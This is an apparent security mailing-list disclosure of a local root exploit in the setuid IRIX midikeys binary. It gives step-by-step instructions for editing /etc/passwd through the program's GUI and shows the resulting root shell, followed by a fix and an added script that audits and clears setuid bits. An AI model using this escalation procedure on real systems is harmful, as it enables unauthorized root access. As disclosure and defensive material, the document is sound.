
IRIX :midikeys root exploit.



Solution: turn off the setuid bit on midikeys for IRIX.

"Larry W. Cashdollar" wrote:
> 
> Aleph1,
>         Please forgive me if this has already been on this list. I searched
> geek-girl with no luck.  I have been auditing our IRIX boxes and found what I
> believe to be a new vulnerability.
> 
>         On IRIX 6.5 systems (IRIX Release 6.5 IP28 )
>         # uname -a
>         IRIX64 devel 6.5 05190004
> 
>         The setuid root binary midikeys can be used to read any file on the
> system using its GUI interface.  It can also be used to edit any file on the
> system.  I was able to get from guest account access to root access using the
> following procedure.
> 
> 
>         1) Choose an unpassworded account and telnet in. I like guest or lp.
> 
>         devel 25% id
>         uid=998 gid=998(guest)
> 
>         2) Execute the midikeys application with display set to your host.
> 
>         devel 26% ./midikeys
>         devel 27% Xlib:  extension "GLX" missing on display "grinch:0.0".
>         Xlib:  extension "GLX" missing on display "grinch:0.0".
> 
>         3) Under the midikeys window click sounds and then midi songs. This will
>         open a file manager type interface.
> 
>         4) You can enter the path and filename of files you wish to read,
>             including root owned with group/world read/write permissions unset.
> 
>         5) If you select a file like "/usr/share/data/music/README" it will
>         appear in a text editor.  Use the text editor to open /etc/passwd and
>         make modifications at will. Save and enjoy.
> 
> So I removed the '*' from sysadm...
> 
> $ su sysadm
> # id
> uid=0(root) gid=0(sys)
> 
> devel 28%  ls -l /usr/sbin/midikeys
> -rwsr-xr-x    1 root     root      218712 Jan 10 17:19 /usr/sbin/midikeys
> 
> 
>         I have tested this on 2 IRIX 6.5 hosts with success. A patch exists for
>         startmidi and stopmidi buffer overflows.
> 
>         More info on previous patch:
>         ftp://sgigate.sgi.com/security/19980301-01-PX.
> 
>         However, I didn't find any for midikeys.
> 
> 
>         -- Larry W. Cashdollar
>            UNIX/Security Operations.
>            Computer Sciences Corporation.
>
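
The fix given in the reply (turning off the setuid bit on midikeys), generalized into an audit, as an added example that is not part of either post: it lists every setuid file under a directory and clears the bit on those missing from a reviewed allowlist. The function names, the script name and the allowlist format (one absolute path per line) are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not from the original posts. Lists setuid files under a
# directory and clears the bit on any that are not on an allowlist.
# Assumption: the allowlist is a text file with one absolute path per line.

# list_setuid DIR: print each regular file under DIR that has the setuid bit.
# No owner filter is applied; add "-user root" to limit it to root-owned files.
list_setuid() {
    find "$1" -type f -perm -4000 -print 2>/dev/null | sort
}

# is_allowed FILE ALLOWLIST: succeed only if FILE is listed verbatim.
is_allowed() {
    [ -f "$2" ] && grep -Fxq -- "$1" "$2"
}

# strip_unlisted DIR ALLOWLIST: run "chmod u-s" on every setuid file that is
# not allowlisted, print each path changed, return non-zero if a chmod fails.
strip_unlisted() {
    list_setuid "$1" | (
        rc=0
        while IFS= read -r f; do
            if is_allowed "$f" "$2"; then
                continue
            fi
            if chmod u-s "$f"; then
                echo "cleared setuid: $f"
            else
                rc=1
            fi
        done
        exit "$rc"
    )
}

# Usage: sh setuid_audit.sh DIR ALLOWLIST   (e.g. /usr/sbin and a reviewed list)
if [ "$#" -eq 2 ]; then
    strip_unlisted "$1" "$2"
fi
```

Running `list_setuid` alone gives a report without changing anything, which is the safer first pass before an allowlist has been reviewed.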